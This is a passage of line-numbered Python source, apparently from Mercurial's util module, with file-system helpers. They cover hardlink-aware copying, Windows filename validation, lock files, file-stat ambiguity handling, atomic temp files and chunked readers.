1878 1879 b'ext3',
1879 1880 b'ext4',
1880 1881 b'hfs',
1881 1882 b'jfs',
1882 1883 b'NTFS',
1883 1884 b'reiserfs',
1884 1885 b'tmpfs',
1885 1886 b'ufs',
1886 1887 b'xfs',
1887 1888 b'zfs',
1888 1889 }
1889 1890
1890 1891
1891 1892 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1892 1893 '''copy a file, preserving mode and optionally other stat info like
1893 1894 atime/mtime
1894 1895
1895 1896 checkambig argument is used with filestat, and is useful only if
1896 1897 destination file is guarded by any lock (e.g. repo.lock or
1897 1898 repo.wlock).
1898 1899
1899 1900 copystat and checkambig should be exclusive.
1900 1901 '''
1901 1902 assert not (copystat and checkambig)
1902 1903 oldstat = None
1903 1904 if os.path.lexists(dest):
1904 1905 if checkambig:
1905 1906 oldstat = checkambig and filestat.frompath(dest)
1906 1907 unlink(dest)
1907 1908 if hardlink:
1908 1909 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1909 1910 # unless we are confident that dest is on a whitelisted filesystem.
1910 1911 try:
1911 1912 fstype = getfstype(os.path.dirname(dest))
1912 1913 except OSError:
1913 1914 fstype = None
1914 1915 if fstype not in _hardlinkfswhitelist:
1915 1916 hardlink = False
1916 1917 if hardlink:
1917 1918 try:
1918 1919 oslink(src, dest)
1919 1920 return
1920 1921 except (IOError, OSError):
1921 1922 pass # fall back to normal copy
1922 1923 if os.path.islink(src):
1923 1924 os.symlink(os.readlink(src), dest)
1924 1925 # copytime is ignored for symlinks, but in general copytime isn't needed
1925 1926 # for them anyway
1926 1927 else:
1927 1928 try:
1928 1929 shutil.copyfile(src, dest)
1929 1930 if copystat:
1930 1931 # copystat also copies mode
1931 1932 shutil.copystat(src, dest)
1932 1933 else:
1933 1934 shutil.copymode(src, dest)
1934 1935 if oldstat and oldstat.stat:
1935 1936 newstat = filestat.frompath(dest)
1936 1937 if newstat.isambig(oldstat):
1937 1938 # stat of copied file is ambiguous to original one
1938 1939 advanced = (
1939 1940 oldstat.stat[stat.ST_MTIME] + 1
1940 1941 ) & 0x7FFFFFFF
1941 1942 os.utime(dest, (advanced, advanced))
1942 1943 except shutil.Error as inst:
1943 1944 raise error.Abort(stringutil.forcebytestr(inst))
1944 1945
1945 1946
1946 1947 def copyfiles(src, dst, hardlink=None, progress=None):
1947 1948 """Copy a directory tree using hardlinks if possible."""
1948 1949 num = 0
1949 1950
1950 1951 def settopic():
1951 1952 if progress:
1952 1953 progress.topic = _(b'linking') if hardlink else _(b'copying')
1953 1954
1954 1955 if os.path.isdir(src):
1955 1956 if hardlink is None:
1956 1957 hardlink = (
1957 1958 os.stat(src).st_dev == os.stat(os.path.dirname(dst)).st_dev
1958 1959 )
1959 1960 settopic()
1960 1961 os.mkdir(dst)
1961 1962 for name, kind in listdir(src):
1962 1963 srcname = os.path.join(src, name)
1963 1964 dstname = os.path.join(dst, name)
1964 1965 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1965 1966 num += n
1966 1967 else:
1967 1968 if hardlink is None:
1968 1969 hardlink = (
1969 1970 os.stat(os.path.dirname(src)).st_dev
1970 1971 == os.stat(os.path.dirname(dst)).st_dev
1971 1972 )
1972 1973 settopic()
1973 1974
1974 1975 if hardlink:
1975 1976 try:
1976 1977 oslink(src, dst)
1977 1978 except (IOError, OSError):
1978 1979 hardlink = False
1979 1980 shutil.copy(src, dst)
1980 1981 else:
1981 1982 shutil.copy(src, dst)
1982 1983 num += 1
1983 1984 if progress:
1984 1985 progress.increment()
1985 1986
1986 1987 return hardlink, num
1987 1988
1988 1989
1989 1990 _winreservednames = {
1990 1991 b'con',
1991 1992 b'prn',
1992 1993 b'aux',
1993 1994 b'nul',
1994 1995 b'com1',
1995 1996 b'com2',
1996 1997 b'com3',
1997 1998 b'com4',
1998 1999 b'com5',
1999 2000 b'com6',
2000 2001 b'com7',
2001 2002 b'com8',
2002 2003 b'com9',
2003 2004 b'lpt1',
2004 2005 b'lpt2',
2005 2006 b'lpt3',
2006 2007 b'lpt4',
2007 2008 b'lpt5',
2008 2009 b'lpt6',
2009 2010 b'lpt7',
2010 2011 b'lpt8',
2011 2012 b'lpt9',
2012 2013 }
2013 2014 _winreservedchars = b':*?"<>|'
2014 2015
2015 2016
2016 2017 def checkwinfilename(path):
2017 2018 r'''Check that the base-relative path is a valid filename on Windows.
2018 2019 Returns None if the path is ok, or a UI string describing the problem.
2019 2020
2020 2021 >>> checkwinfilename(b"just/a/normal/path")
2021 2022 >>> checkwinfilename(b"foo/bar/con.xml")
2022 2023 "filename contains 'con', which is reserved on Windows"
2023 2024 >>> checkwinfilename(b"foo/con.xml/bar")
2024 2025 "filename contains 'con', which is reserved on Windows"
2025 2026 >>> checkwinfilename(b"foo/bar/xml.con")
2026 2027 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
2027 2028 "filename contains 'AUX', which is reserved on Windows"
2028 2029 >>> checkwinfilename(b"foo/bar/bla:.txt")
2029 2030 "filename contains ':', which is reserved on Windows"
2030 2031 >>> checkwinfilename(b"foo/bar/b\07la.txt")
2031 2032 "filename contains '\\x07', which is invalid on Windows"
2032 2033 >>> checkwinfilename(b"foo/bar/bla ")
2033 2034 "filename ends with ' ', which is not allowed on Windows"
2034 2035 >>> checkwinfilename(b"../bar")
2035 2036 >>> checkwinfilename(b"foo\\")
2036 2037 "filename ends with '\\', which is invalid on Windows"
2037 2038 >>> checkwinfilename(b"foo\\/bar")
2038 2039 "directory name ends with '\\', which is invalid on Windows"
2039 2040 '''
2040 2041 if path.endswith(b'\\'):
2041 2042 return _(b"filename ends with '\\', which is invalid on Windows")
2042 2043 if b'\\/' in path:
2043 2044 return _(b"directory name ends with '\\', which is invalid on Windows")
2044 2045 for n in path.replace(b'\\', b'/').split(b'/'):
2045 2046 if not n:
2046 2047 continue
2047 2048 for c in _filenamebytestr(n):
2048 2049 if c in _winreservedchars:
2049 2050 return (
2050 2051 _(
2051 2052 b"filename contains '%s', which is reserved "
2052 2053 b"on Windows"
2053 2054 )
2054 2055 % c
2055 2056 )
2056 2057 if ord(c) <= 31:
2057 2058 return _(
2058 2059 b"filename contains '%s', which is invalid on Windows"
2059 2060 ) % stringutil.escapestr(c)
2060 2061 base = n.split(b'.')[0]
2061 2062 if base and base.lower() in _winreservednames:
2062 2063 return (
2063 2064 _(b"filename contains '%s', which is reserved on Windows")
2064 2065 % base
2065 2066 )
2066 2067 t = n[-1:]
2067 2068 if t in b'. ' and n not in b'..':
2068 2069 return (
2069 2070 _(
2070 2071 b"filename ends with '%s', which is not allowed "
2071 2072 b"on Windows"
2072 2073 )
2073 2074 % t
2074 2075 )
2075 2076
2076 2077
2077 2078 timer = getattr(time, "perf_counter", None)
2078 2079
2079 2080 if pycompat.iswindows:
2080 2081 checkosfilename = checkwinfilename
2081 2082 if not timer:
2082 2083 timer = time.clock
2083 2084 else:
2084 2085 # mercurial.windows doesn't have platform.checkosfilename
2085 2086 checkosfilename = platform.checkosfilename # pytype: disable=module-attr
2086 2087 if not timer:
2087 2088 timer = time.time
2088 2089
2089 2090
2090 2091 def makelock(info, pathname):
2091 2092 """Create a lock file atomically if possible
2092 2093
2093 2094 This may leave a stale lock file if symlink isn't supported and signal
2094 2095 interrupt is enabled.
2095 2096 """
2096 2097 try:
2097 2098 return os.symlink(info, pathname)
2098 2099 except OSError as why:
2099 2100 if why.errno == errno.EEXIST:
2100 2101 raise
2101 2102 except AttributeError: # no symlink in os
2102 2103 pass
2103 2104
2104 2105 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
2105 2106 ld = os.open(pathname, flags)
2106 2107 os.write(ld, info)
2107 2108 os.close(ld)
2108 2109
2109 2110
2110 2111 def readlock(pathname):
2111 2112 try:
2112 2113 return readlink(pathname)
2113 2114 except OSError as why:
2114 2115 if why.errno not in (errno.EINVAL, errno.ENOSYS):
2115 2116 raise
2116 2117 except AttributeError: # no symlink in os
2117 2118 pass
2118 2119 with posixfile(pathname, b'rb') as fp:
2119 2120 return fp.read()
2120 2121
2121 2122
2122 2123 def fstat(fp):
2123 2124 '''stat file object that may not have fileno method.'''
2124 2125 try:
2125 2126 return os.fstat(fp.fileno())
2126 2127 except AttributeError:
2127 2128 return os.stat(fp.name)
2128 2129
2129 2130
2130 2131 # File system features
2131 2132
2132 2133
2133 2134 def fscasesensitive(path):
2134 2135 """
2135 2136 Return true if the given path is on a case-sensitive filesystem
2136 2137
2137 2138 Requires a path (like /foo/.hg) ending with a foldable final
2138 2139 directory component.
2139 2140 """
2140 2141 s1 = os.lstat(path)
2141 2142 d, b = os.path.split(path)
2142 2143 b2 = b.upper()
2143 2144 if b == b2:
2144 2145 b2 = b.lower()
2145 2146 if b == b2:
2146 2147 return True # no evidence against case sensitivity
2147 2148 p2 = os.path.join(d, b2)
2148 2149 try:
2149 2150 s2 = os.lstat(p2)
2150 2151 if s2 == s1:
2151 2152 return False
2152 2153 return True
2153 2154 except OSError:
2154 2155 return True
2155 2156
2156 2157
2157 2158 try:
2158 2159 import re2 # pytype: disable=import-error
2159 2160
2160 2161 _re2 = None
2161 2162 except ImportError:
2162 2163 _re2 = False
2163 2164
2164 2165
2165 2166 class _re(object):
2166 2167 def _checkre2(self):
2167 2168 global _re2
2168 2169 try:
2169 2170 # check if match works, see issue3964
2170 2171 _re2 = bool(re2.match(r'\[([^\[]+)\]', b'[ui]'))
2171 2172 except ImportError:
2172 2173 _re2 = False
2173 2174
2174 2175 def compile(self, pat, flags=0):
2175 2176 '''Compile a regular expression, using re2 if possible
2176 2177
2177 2178 For best performance, use only re2-compatible regexp features. The
2178 2179 only flags from the re module that are re2-compatible are
2179 2180 IGNORECASE and MULTILINE.'''
2180 2181 if _re2 is None:
2181 2182 self._checkre2()
2182 2183 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
2183 2184 if flags & remod.IGNORECASE:
2184 2185 pat = b'(?i)' + pat
2185 2186 if flags & remod.MULTILINE:
2186 2187 pat = b'(?m)' + pat
2187 2188 try:
2188 2189 return re2.compile(pat)
2189 2190 except re2.error:
2190 2191 pass
2191 2192 return remod.compile(pat, flags)
2192 2193
2193 2194 @propertycache
2194 2195 def escape(self):
2195 2196 '''Return the version of escape corresponding to self.compile.
2196 2197
2197 2198 This is imperfect because whether re2 or re is used for a particular
2198 2199 function depends on the flags, etc, but it's the best we can do.
2199 2200 '''
2200 2201 global _re2
2201 2202 if _re2 is None:
2202 2203 self._checkre2()
2203 2204 if _re2:
2204 2205 return re2.escape
2205 2206 else:
2206 2207 return remod.escape
2207 2208
2208 2209
2209 2210 re = _re()
2210 2211
2211 2212 _fspathcache = {}
2212 2213
2213 2214
2214 2215 def fspath(name, root):
2215 2216 '''Get name in the case stored in the filesystem
2216 2217
2217 2218 The name should be relative to root, and be normcase-ed for efficiency.
2218 2219
2219 2220 Note that this function is unnecessary, and should not be
2220 2221 called, for case-sensitive filesystems (simply because it's expensive).
2221 2222
2222 2223 The root should be normcase-ed, too.
2223 2224 '''
2224 2225
2225 2226 def _makefspathcacheentry(dir):
2226 2227 return {normcase(n): n for n in os.listdir(dir)}
2227 2228
2228 2229 seps = pycompat.ossep
2229 2230 if pycompat.osaltsep:
2230 2231 seps = seps + pycompat.osaltsep
2231 2232 # Protect backslashes. This gets silly very quickly.
2232 2233 seps.replace(b'\\', b'\\\\')
2233 2234 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
2234 2235 dir = os.path.normpath(root)
2235 2236 result = []
2236 2237 for part, sep in pattern.findall(name):
2237 2238 if sep:
2238 2239 result.append(sep)
2239 2240 continue
2240 2241
2241 2242 if dir not in _fspathcache:
2242 2243 _fspathcache[dir] = _makefspathcacheentry(dir)
2243 2244 contents = _fspathcache[dir]
2244 2245
2245 2246 found = contents.get(part)
2246 2247 if not found:
2247 2248 # retry "once per directory" per "dirstate.walk" which
2248 2249 # may take place for each patches of "hg qpush", for example
2249 2250 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
2250 2251 found = contents.get(part)
2251 2252
2252 2253 result.append(found or part)
2253 2254 dir = os.path.join(dir, part)
2254 2255
2255 2256 return b''.join(result)
2256 2257
2257 2258
2258 2259 def checknlink(testfile):
2259 2260 '''check whether hardlink count reporting works properly'''
2260 2261
2261 2262 # testfile may be open, so we need a separate file for checking to
2262 2263 # work around issue2543 (or testfile may get lost on Samba shares)
2263 2264 f1, f2, fp = None, None, None
2264 2265 try:
2265 2266 fd, f1 = pycompat.mkstemp(
2266 2267 prefix=b'.%s-' % os.path.basename(testfile),
2267 2268 suffix=b'1~',
2268 2269 dir=os.path.dirname(testfile),
2269 2270 )
2270 2271 os.close(fd)
2271 2272 f2 = b'%s2~' % f1[:-2]
2272 2273
2273 2274 oslink(f1, f2)
2274 2275 # nlinks() may behave differently for files on Windows shares if
2275 2276 # the file is open.
2276 2277 fp = posixfile(f2)
2277 2278 return nlinks(f2) > 1
2278 2279 except OSError:
2279 2280 return False
2280 2281 finally:
2281 2282 if fp is not None:
2282 2283 fp.close()
2283 2284 for f in (f1, f2):
2284 2285 try:
2285 2286 if f is not None:
2286 2287 os.unlink(f)
2287 2288 except OSError:
2288 2289 pass
2289 2290
2290 2291
2291 2292 def endswithsep(path):
2292 2293 '''Check path ends with os.sep or os.altsep.'''
2293 2294 return (
2294 2295 path.endswith(pycompat.ossep)
2295 2296 or pycompat.osaltsep
2296 2297 and path.endswith(pycompat.osaltsep)
2297 2298 )
2298 2299
2299 2300
2300 2301 def splitpath(path):
2301 2302 '''Split path by os.sep.
2302 2303 Note that this function does not use os.altsep because this is
2303 2304 an alternative of simple "xxx.split(os.sep)".
2304 2305 It is recommended to use os.path.normpath() before using this
2305 2306 function if need.'''
2306 2307 return path.split(pycompat.ossep)
2307 2308
2308 2309
2309 2310 def mktempcopy(name, emptyok=False, createmode=None, enforcewritable=False):
2310 2311 """Create a temporary file with the same contents from name
2311 2312
2312 2313 The permission bits are copied from the original file.
2313 2314
2314 2315 If the temporary file is going to be truncated immediately, you
2315 2316 can use emptyok=True as an optimization.
2316 2317
2317 2318 Returns the name of the temporary file.
2318 2319 """
2319 2320 d, fn = os.path.split(name)
2320 2321 fd, temp = pycompat.mkstemp(prefix=b'.%s-' % fn, suffix=b'~', dir=d)
2321 2322 os.close(fd)
2322 2323 # Temporary files are created with mode 0600, which is usually not
2323 2324 # what we want. If the original file already exists, just copy
2324 2325 # its mode. Otherwise, manually obey umask.
2325 2326 copymode(name, temp, createmode, enforcewritable)
2326 2327
2327 2328 if emptyok:
2328 2329 return temp
2329 2330 try:
2330 2331 try:
2331 2332 ifp = posixfile(name, b"rb")
2332 2333 except IOError as inst:
2333 2334 if inst.errno == errno.ENOENT:
2334 2335 return temp
2335 2336 if not getattr(inst, 'filename', None):
2336 2337 inst.filename = name
2337 2338 raise
2338 2339 ofp = posixfile(temp, b"wb")
2339 2340 for chunk in filechunkiter(ifp):
2340 2341 ofp.write(chunk)
2341 2342 ifp.close()
2342 2343 ofp.close()
2343 2344 except: # re-raises
2344 2345 try:
2345 2346 os.unlink(temp)
2346 2347 except OSError:
2347 2348 pass
2348 2349 raise
2349 2350 return temp
2350 2351
2351 2352
2352 2353 class filestat(object):
2353 2354 """help to exactly detect change of a file
2354 2355
2355 2356 'stat' attribute is result of 'os.stat()' if specified 'path'
2356 2357 exists. Otherwise, it is None. This can avoid preparative
2357 2358 'exists()' examination on client side of this class.
2358 2359 """
2359 2360
2360 2361 def __init__(self, stat):
2361 2362 self.stat = stat
2362 2363
2363 2364 @classmethod
2364 2365 def frompath(cls, path):
2365 2366 try:
2366 2367 stat = os.stat(path)
2367 2368 except OSError as err:
2368 2369 if err.errno != errno.ENOENT:
2369 2370 raise
2370 2371 stat = None
2371 2372 return cls(stat)
2372 2373
2373 2374 @classmethod
2374 2375 def fromfp(cls, fp):
2375 2376 stat = os.fstat(fp.fileno())
2376 2377 return cls(stat)
2377 2378
2378 2379 __hash__ = object.__hash__
2379 2380
2380 2381 def __eq__(self, old):
2381 2382 try:
2382 2383 # if ambiguity between stat of new and old file is
2383 2384 # avoided, comparison of size, ctime and mtime is enough
2384 2385 # to exactly detect change of a file regardless of platform
2385 2386 return (
2386 2387 self.stat.st_size == old.stat.st_size
2387 2388 and self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]
2388 2389 and self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME]
2389 2390 )
2390 2391 except AttributeError:
2391 2392 pass
2392 2393 try:
2393 2394 return self.stat is None and old.stat is None
2394 2395 except AttributeError:
2395 2396 return False
2396 2397
2397 2398 def isambig(self, old):
2398 2399 """Examine whether new (= self) stat is ambiguous against old one
2399 2400
2400 2401 "S[N]" below means stat of a file at N-th change:
2401 2402
2402 2403 - S[n-1].ctime < S[n].ctime: can detect change of a file
2403 2404 - S[n-1].ctime == S[n].ctime
2404 2405 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2405 2406 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2406 2407 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2407 2408 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2408 2409
2409 2410 Case (*2) above means that a file was changed twice or more at
2410 2411 same time in sec (= S[n-1].ctime), and comparison of timestamp
2411 2412 is ambiguous.
2412 2413
2413 2414 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2414 2415 timestamp is ambiguous".
2415 2416
2416 2417 But advancing mtime only in case (*2) doesn't work as
2417 2418 expected, because naturally advanced S[n].mtime in case (*1)
2418 2419 might be equal to manually advanced S[n-1 or earlier].mtime.
2419 2420
2420 2421 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2421 2422 treated as ambiguous regardless of mtime, to avoid overlooking
2422 2423 by confliction between such mtime.
2423 2424
2424 2425 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2425 2426 S[n].mtime", even if size of a file isn't changed.
2426 2427 """
2427 2428 try:
2428 2429 return self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]
2429 2430 except AttributeError:
2430 2431 return False
2431 2432
2432 2433 def avoidambig(self, path, old):
2433 2434 """Change file stat of specified path to avoid ambiguity
2434 2435
2435 2436 'old' should be previous filestat of 'path'.
2436 2437
2437 2438 This skips avoiding ambiguity, if a process doesn't have
2438 2439 appropriate privileges for 'path'. This returns False in this
2439 2440 case.
2440 2441
2441 2442 Otherwise, this returns True, as "ambiguity is avoided".
2442 2443 """
2443 2444 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
2444 2445 try:
2445 2446 os.utime(path, (advanced, advanced))
2446 2447 except OSError as inst:
2447 2448 if inst.errno == errno.EPERM:
2448 2449 # utime() on the file created by another user causes EPERM,
2449 2450 # if a process doesn't have appropriate privileges
2450 2451 return False
2451 2452 raise
2452 2453 return True
2453 2454
2454 2455 def __ne__(self, other):
2455 2456 return not self == other
2456 2457
2457 2458
2458 2459 class atomictempfile(object):
2459 2460 '''writable file object that atomically updates a file
2460 2461
2461 2462 All writes will go to a temporary copy of the original file. Call
2462 2463 close() when you are done writing, and atomictempfile will rename
2463 2464 the temporary copy to the original name, making the changes
2464 2465 visible. If the object is destroyed without being closed, all your
2465 2466 writes are discarded.
2466 2467
2467 2468 checkambig argument of constructor is used with filestat, and is
2468 2469 useful only if target file is guarded by any lock (e.g. repo.lock
2469 2470 or repo.wlock).
2470 2471 '''
2471 2472
2472 2473 def __init__(self, name, mode=b'w+b', createmode=None, checkambig=False):
2473 2474 self.__name = name # permanent name
2474 2475 self._tempname = mktempcopy(
2475 2476 name,
2476 2477 emptyok=(b'w' in mode),
2477 2478 createmode=createmode,
2478 2479 enforcewritable=(b'w' in mode),
2479 2480 )
2480 2481
2481 2482 self._fp = posixfile(self._tempname, mode)
2482 2483 self._checkambig = checkambig
2483 2484
2484 2485 # delegated methods
2485 2486 self.read = self._fp.read
2486 2487 self.write = self._fp.write
2487 2488 self.seek = self._fp.seek
2488 2489 self.tell = self._fp.tell
2489 2490 self.fileno = self._fp.fileno
2490 2491
2491 2492 def close(self):
2492 2493 if not self._fp.closed:
2493 2494 self._fp.close()
2494 2495 filename = localpath(self.__name)
2495 2496 oldstat = self._checkambig and filestat.frompath(filename)
2496 2497 if oldstat and oldstat.stat:
2497 2498 rename(self._tempname, filename)
2498 2499 newstat = filestat.frompath(filename)
2499 2500 if newstat.isambig(oldstat):
2500 2501 # stat of changed file is ambiguous to original one
2501 2502 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
2502 2503 os.utime(filename, (advanced, advanced))
2503 2504 else:
2504 2505 rename(self._tempname, filename)
2505 2506
2506 2507 def discard(self):
2507 2508 if not self._fp.closed:
2508 2509 try:
2509 2510 os.unlink(self._tempname)
2510 2511 except OSError:
2511 2512 pass
2512 2513 self._fp.close()
2513 2514
2514 2515 def __del__(self):
2515 2516 if safehasattr(self, '_fp'): # constructor actually did something
2516 2517 self.discard()
2517 2518
2518 2519 def __enter__(self):
2519 2520 return self
2520 2521
2521 2522 def __exit__(self, exctype, excvalue, traceback):
2522 2523 if exctype is not None:
2523 2524 self.discard()
2524 2525 else:
2525 2526 self.close()
2526 2527
2527 2528
2528 2529 def unlinkpath(f, ignoremissing=False, rmdir=True):
2529 2530 """unlink and remove the directory if it is empty"""
2530 2531 if ignoremissing:
2531 2532 tryunlink(f)
2532 2533 else:
2533 2534 unlink(f)
2534 2535 if rmdir:
2535 2536 # try removing directories that might now be empty
2536 2537 try:
2537 2538 removedirs(os.path.dirname(f))
2538 2539 except OSError:
2539 2540 pass
2540 2541
2541 2542
2542 2543 def tryunlink(f):
2543 2544 """Attempt to remove a file, ignoring ENOENT errors."""
2544 2545 try:
2545 2546 unlink(f)
2546 2547 except OSError as e:
2547 2548 if e.errno != errno.ENOENT:
2548 2549 raise
2549 2550
2550 2551
2551 2552 def makedirs(name, mode=None, notindexed=False):
2552 2553 """recursive directory creation with parent mode inheritance
2553 2554
2554 2555 Newly created directories are marked as "not to be indexed by
2555 2556 the content indexing service", if ``notindexed`` is specified
2556 2557 for "write" mode access.
2557 2558 """
2558 2559 try:
2559 2560 makedir(name, notindexed)
2560 2561 except OSError as err:
2561 2562 if err.errno == errno.EEXIST:
2562 2563 return
2563 2564 if err.errno != errno.ENOENT or not name:
2564 2565 raise
2565 2566 parent = os.path.dirname(os.path.abspath(name))
2566 2567 if parent == name:
2567 2568 raise
2568 2569 makedirs(parent, mode, notindexed)
2569 2570 try:
2570 2571 makedir(name, notindexed)
2571 2572 except OSError as err:
2572 2573 # Catch EEXIST to handle races
2573 2574 if err.errno == errno.EEXIST:
2574 2575 return
2575 2576 raise
2576 2577 if mode is not None:
2577 2578 os.chmod(name, mode)
2578 2579
2579 2580
2580 2581 def readfile(path):
2581 2582 with open(path, b'rb') as fp:
2582 2583 return fp.read()
2583 2584
2584 2585
2585 2586 def writefile(path, text):
2586 2587 with open(path, b'wb') as fp:
2587 2588 fp.write(text)
2588 2589
2589 2590
2590 2591 def appendfile(path, text):
2591 2592 with open(path, b'ab') as fp:
2592 2593 fp.write(text)
2593 2594
2594 2595
2595 2596 class chunkbuffer(object):
2596 2597 """Allow arbitrary sized chunks of data to be efficiently read from an
2597 2598 iterator over chunks of arbitrary size."""
2598 2599
2599 2600 def __init__(self, in_iter):
2600 2601 """in_iter is the iterator that's iterating over the input chunks."""
2601 2602
2602 2603 def splitbig(chunks):
2603 2604 for chunk in chunks:
2604 2605 if len(chunk) > 2 ** 20:
2605 2606 pos = 0
2606 2607 while pos < len(chunk):
2607 2608 end = pos + 2 ** 18
2608 2609 yield chunk[pos:end]
2609 2610 pos = end
2610 2611 else:
2611 2612 yield chunk
2612 2613
2613 2614 self.iter = splitbig(in_iter)
2614 2615 self._queue = collections.deque()
2615 2616 self._chunkoffset = 0
2616 2617
2617 2618 def read(self, l=None):
2618 2619 """Read L bytes of data from the iterator of chunks of data.
2619 2620 Returns less than L bytes if the iterator runs dry.
2620 2621
2621 2622 If size parameter is omitted, read everything"""
2622 2623 if l is None:
2623 2624 return b''.join(self.iter)
2624 2625
2625 2626 left = l
2626 2627 buf = []
2627 2628 queue = self._queue
2628 2629 while left > 0:
2629 2630 # refill the queue
2630 2631 if not queue:
2631 2632 target = 2 ** 18
2632 2633 for chunk in self.iter:
2633 2634 queue.append(chunk)
2634 2635 target -= len(chunk)
2635 2636 if target <= 0:
2636 2637 break
2637 2638 if not queue:
2638 2639 break
2639 2640
2640 2641 # The easy way to do this would be to queue.popleft(), modify the
2641 2642 # chunk (if necessary), then queue.appendleft(). However, for cases
2642 2643 # where we read partial chunk content, this incurs 2 dequeue
2643 2644 # mutations and creates a new str for the remaining chunk in the
2644 2645 # queue. Our code below avoids this overhead.
2645 2646
2646 2647 chunk = queue[0]
2647 2648 chunkl = len(chunk)
2648 2649 offset = self._chunkoffset
2649 2650
2650 2651 # Use full chunk.
2651 2652 if offset == 0 and left >= chunkl:
2652 2653 left -= chunkl
2653 2654 queue.popleft()
2654 2655 buf.append(chunk)
2655 2656 # self._chunkoffset remains at 0.
2656 2657 continue
2657 2658
2658 2659 chunkremaining = chunkl - offset
2659 2660
2660 2661 # Use all of unconsumed part of chunk.
2661 2662 if left >= chunkremaining:
2662 2663 left -= chunkremaining
2663 2664 queue.popleft()
2664 2665 # offset == 0 is enabled by block above, so this won't merely
2665 2666 # copy via ``chunk[0:]``.
2666 2667 buf.append(chunk[offset:])
2667 2668 self._chunkoffset = 0
2668 2669
2669 2670 # Partial chunk needed.
2670 2671 else:
2671 2672 buf.append(chunk[offset : offset + left])
2672 2673 self._chunkoffset += left
2673 2674 left -= chunkremaining
2674 2675
2675 2676 return b''.join(buf)
2676 2677
2677 2678
2678 2679 def filechunkiter(f, size=131072, limit=None):
2679 2680 """Create a generator that produces the data in the file size
2680 2681 (default 131072) bytes at a time, up to optional limit (default is
2681 2682 to read all data). Chunks may be less than size bytes if the
2682 2683 chunk is the last chunk in the file, or the file is a socket or
2683 2684 some other type of file that sometimes reads less data than is
2684 2685 requested."""
2685 2686 assert size >= 0
2686 2687 assert limit is None or limit >= 0
2687 2688 while True:
2688 2689 if limit is None:
2689 2690 nbytes = size
2690 2691 else:
2691 2692 nbytes = min(limit, size)
2692 2693 s = nbytes and f.read(nbytes)
2693 2694 if not s:
2694 2695 break
2695 2696 if limit:
2696 2697 limit -= len(s)
2697 2698 yield s
2698 2699
2699 2700
2700 2701 class cappedreader(object):
2701 2702 """A file object proxy that allows reading up to N bytes.
2702 2703
2703 2704 Given a source file object, instances of this type allow reading up to
2704 2705 N bytes from that source file object. Attempts to read past the allowed
2705 2706 limit are treated as EOF.
2706 2707
2707 2708 It is assumed that I/O is not performed on the original file object
2708 2709 in addition to I/O that is performed by this instance. If there is,
2709 2710 state tracking will get out of sync and unexpected results will ensue.
2710 2711 """
2711 2712
2712 2713 def __init__(self, fh, limit):
2713 2714 """Allow reading up to <limit> bytes from <fh>."""
2714 2715 self._fh = fh
2715 2716 self._left = limit
2716 2717
2717 2718 def read(self, n=-1):
2718 2719 if not self._left:
2719 2720 return b''
2720 2721
2721 2722 if n < 0:
2722 2723 n = self._left
2723 2724
2724 2725 data = self._fh.read(min(n, self._left))
2725 2726 self._left -= len(data)
2726 2727 assert self._left >= 0
2727 2728
2728 2729 return data
2729 2730
2730 2731 def readinto(self, b):
2731 2732 res = self.read(len(b))
2732 2733 if res is None:
2733 2734 return None
2734 2735
2735 2736 b[0 : len(res)] = res
2736 2737 return len(res)
2737 2738
2738 2739
2739 2740 def unitcountfn(*unittable):
2740 2741 '''return a function that renders a readable count of some quantity'''
2741 2742
2742 2743 def go(count):
2743 2744 for multiplier, divisor, format in unittable:
2744 2745 if abs(count) >= divisor * multiplier:
2745 2746 return format % (count / float(divisor))
2746 2747 return unittable[-1][2] % count
2747 2748
2748 2749 return go
2749 2750
2750 2751
2751 2752 def processlinerange(fromline, toline):
2752 2753 """Check that linerange <fromline>:<toline> makes sense and return a
2753 2754 0-based range.
2754 2755
2755 2756 >>> processlinerange(10, 20)
2756 2757 (9, 20)
2757 2758 >>> processlinerange(2, 1)
2758 2759 Traceback (most recent call last):
2759 2760 ...
2760 2761 ParseError: line range must be positive
2761 2762 >>> processlinerange(0, 5)
2762 2763 Traceback (most recent call last):
2763 2764 ...
2764 2765 ParseError: fromline must be strictly positive
2765 2766 """
2766 2767 if toline - fromline < 0:
2767 2768 raise error.ParseError(_(b"line range must be positive"))
2768 2769 if fromline < 1:
2769 2770 raise error.ParseError(_(b"fromline must be strictly positive"))
2770 2771 return fromline - 1, toline
2771 2772
2772 2773
2773 2774 bytecount = unitcountfn(
2774 2775 (100, 1 << 30, _(b'%.0f GB')),
2775 2776 (10, 1 << 30, _(b'%.1f GB')),
2776 2777 (1, 1 << 30, _(b'%.2f GB')),
2777 2778 (100, 1 << 20, _(b'%.0f MB')),
2778 2779 (10, 1 << 20, _(b'%.1f MB')),
2779 2780 (1, 1 << 20, _(b'%.2f MB')),
2780 2781 (100, 1 << 10, _(b'%.0f KB')),
2781 2782 (10, 1 << 10, _(b'%.1f KB')),
2782 2783 (1, 1 << 10, _(b'%.2f KB')),
2783 2784 (1, 1, _(b'%.0f bytes')),
2784 2785 )
2785 2786
2786 2787
2787 2788 class transformingwriter(object):
2788 2789 """Writable file wrapper to transform data by function"""
2789 2790
2790 2791 def __init__(self, fp, encode):
2791 2792 self._fp = fp
2792 2793 self._encode = encode
2793 2794
2794 2795 def close(self):
2795 2796 self._fp.close()
2796 2797
2797 2798 def flush(self):
2798 2799 self._fp.flush()
2799 2800
2800 2801 def write(self, data):
